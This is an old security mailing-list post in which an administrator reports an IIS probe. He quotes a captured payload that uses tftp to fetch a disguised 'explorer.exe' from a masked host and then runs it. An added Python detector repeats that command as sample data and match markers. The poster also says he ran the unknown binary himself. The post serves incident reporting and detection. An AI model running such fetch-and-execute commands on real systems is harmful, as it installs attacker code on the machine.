Re: Re: New http attack?
phil_at_ramtronik.com
Date: 06/20/05
- Previous message: Harlan Carvey: "part deux, was -> RE: Digital forensics of the physical memory"
- Maybe in reply to: Ron: "Re: New http attack?"
- Next in thread: phil_at_ramtronik.com: "Re: Re: New http attack?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 19 Jun 2005 22:14:59 -0000
To: incidents@securityfocus.com

Hello,
Saw your post after considerable searching for the same mysterious 'get / 401' errors in my IIS log. I managed to get a full capture of the communication; further down from the 'QUFB' repetition was an embedded string:
cmd /c tftp -i x.x.x.x GET explorer.exe
start explorer.exe
exit
Have hidden IP for obvious reasons. I managed to download the file myself manually, and submitted to Symantec, as my virus checker didn't flag it. Incidentally, I ran the file, and it wasn't explorer, though I don't know what it is.
Phil
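
A defensive check for the indicators described in the message above, as an added example that is not part of the original post: 'QUFB' is the base64 encoding of 'AAA', so this code decodes long base64 runs in a captured request, flags decoded filler padding, and looks for the command fragments quoted in the message. The sample capture, its header layout, the function names and the thresholds are constructed assumptions.

```python
import base64
import re

# Long base64 runs: a payload-sized blob, not an ordinary token.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}")
# Command fragments taken from the string quoted in the message.
CMD_MARKERS = (b"cmd /c", b"tftp -i")

# Constructed capture (layout is an assumption): filler run, then the command.
SAMPLE = (b"GET / HTTP/1.0\r\nAuthorization: Negotiate " + b"QUFB" * 40 +
          b"\r\n\r\ncmd /c tftp -i x.x.x.x GET explorer.exe\r\n")


def longest_repeat(data: bytes) -> int:
    """Length of the longest run of one repeated byte."""
    best = run = 0
    prev = None
    for b in data:
        run = run + 1 if b == prev else 1
        prev = b
        best = max(best, run)
    return best


def inspect_request(raw: bytes, min_fill: int = 48) -> dict:
    """Flag decoded filler padding and embedded commands in a raw request."""
    findings = {"filler": False, "commands": []}
    views = [raw]
    for m in B64_RUN.finditer(raw):
        blob = m.group(0)
        blob = blob[: len(blob) - len(blob) % 4]  # whole 4-char groups only
        decoded = base64.b64decode(blob, validate=True)
        views.append(decoded)
        if longest_repeat(decoded) >= min_fill:
            findings["filler"] = True
    # Search the raw bytes and every decoded blob for the command fragments.
    for view in views:
        lowered = view.lower()
        for marker in CMD_MARKERS:
            name = marker.decode()
            if marker in lowered and name not in findings["commands"]:
                findings["commands"].append(name)
    return findings


if __name__ == "__main__":
    print(inspect_request(SAMPLE))
```
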